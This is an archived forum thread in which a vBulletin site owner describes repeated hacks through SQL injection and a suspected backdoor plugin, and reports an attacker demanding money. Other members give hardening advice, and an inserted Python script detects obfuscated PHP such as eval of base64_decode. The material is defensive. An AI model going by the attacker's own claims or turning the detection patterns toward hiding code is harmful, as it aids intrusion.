The Archive of Official vBulletin Modifications Site. It is not a VB3 engine, just a parsed copy!
#1
Urgent Help Needed: Site Hacked How?
Hi
My site www.computerforums.org was hacked a few weeks back by using the search function to search a group, which then enabled them to run SQL injection and get my password ( http://www.youtube.com/watch?v=ztCFJvzv3NM ). There was a patch available to stop this threat, so I restored the site from a backup and installed this patch (which did fix the issue, as I tested it).

But yesterday they hacked me again. So I restored the database from a week back, then I deleted all files and only uploaded the latest version of VB files and performed an upgrade to the latest version of VB. (So I have a fresh upgraded install of VB.) But again today I've been hacked. I believe they have uploaded a shell program but I cannot find it. I keep changing my passwords every few hours (Username + Hosting + SQL) but they keep getting back in. Any ideas what I can do??

The hacker has been sending me messages. This is what he has told me; I don't know if the below is true, but this is what he is saying:

- He is using an SQL injection hack to get in
- The vulnerability is in the vBulletin files, all versions (but I uploaded fresh VB files and upgraded). Could it be in the database somewhere?
- He wants money to stop the attacks

--------------- Added [DATE]1322388545[/DATE] at [TIME]1322388545[/TIME] ---------------

I have just found out that I have been hacked using this http://itsecbiz.blogspot.com/2011/07...f-you-got.html and I have decoded the file and it reads this

Quote:
#2
According to the blog, the attacker has to have admin access to start with. The hack is installed either as a skin XML or as a mod plugin. Is it just you and David as admins?
Something, either the hosting or a mod, has punched a hole in your security. The fact they were already in the ACP to install the plugin is disturbing.
#3
Disabling the plugin may work. A shell is a trojan, a back door into your system. If your site is just being hosted thru a register then that could work just by deleting it. However, if you are hosting your forum on a VPS or your own dedicated server then he could have uploaded a shell somewhere else which could give him easy access into your domain. Contact your hosting and tell them to disable shells from running. I am and change all of your passwords.
Also, edit your .htaccess to only allow YOUR IP to hit the admincp and your moderators (if they & you use dynamic IPs). There are tutorials on how to secure your forum around. And also, rename your admin and modcp folder to something else, and also edit them in the config.php to match. This is another form of security for your forum, so by default it's yourforum/admincp; it is a good idea to change that to something else. Sure, a hacker could also crawl your site to try to find it, but naming it something incognito like, say, youforum.com/lmages (with a lower case L) may throw them off. Most of these SQL hackers do not know very much and just follow others' tutorials. Without a deeper understanding of vBulletin itself they may be thrown off guard and move on.
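An added example, not part of the thread and not vBulletin code: one way to hunt for the uploaded shell and the skin-XML/plugin route discussed above is to sweep a copy of the web root for obfuscated PHP and for files changed since the clean restore. The patterns, function names and sample tree below are assumptions constructed for illustration.

```python
import base64
import os
import re
import tempfile

# Heuristic markers of obfuscated PHP (an assumed, non-exhaustive list).
PATTERNS = {
    "eval-of-decoder": re.compile(
        rb"eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    "long-base64-literal": re.compile(rb"['\"][A-Za-z0-9+/=]{200,}['\"]"),
}
SCAN_EXT = (".php", ".xml")  # PHP files plus exported style/plugin XML

def scan_tree(root, restored_at=None):
    """Return sorted [(relative_path, [reasons])] for files worth a manual look."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(SCAN_EXT):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read()
            reasons = [label for label, rx in PATTERNS.items() if rx.search(data)]
            # Anything changed after the clean restore did not come from the backup.
            if restored_at is not None and os.path.getmtime(path) > restored_at:
                reasons.append("modified-after-restore")
            if reasons:
                findings.append((os.path.relpath(path, root).replace(os.sep, "/"), reasons))
    return sorted(findings)

def build_demo_tree(restored_at):
    """Constructed sample tree: one clean file, two carrying a harmless encoded echo."""
    root = tempfile.mkdtemp(prefix="forum-demo-")
    blob = base64.b64encode(b"echo 'constructed sample';").decode()
    old, new = restored_at - 3600, restored_at + 60
    samples = {
        "index.php": ("<?php echo 'forum home'; ?>", old),
        "images/smilies/cache.php": ("<?php eval(base64_decode('%s')); ?>" % blob, new),
        "style-export.xml": ("<style><![CDATA[eval(gzinflate(base64_decode('%s')));]]></style>" % blob, old),
    }
    for rel, (body, mtime) in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
        os.utime(path, (mtime, mtime))  # pin mtimes so the restore cut-off is testable
    return root
```

A hit is a prompt for manual review, not proof of compromise; comparing the tree against a fresh copy of the distribution files narrows the list further.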
#4
Woah! Last night I checked the site as I am a long time member there. Got the database errors screen. This morning just a blank page.
Good advice preemz. Hope he gets it back up pretty quick.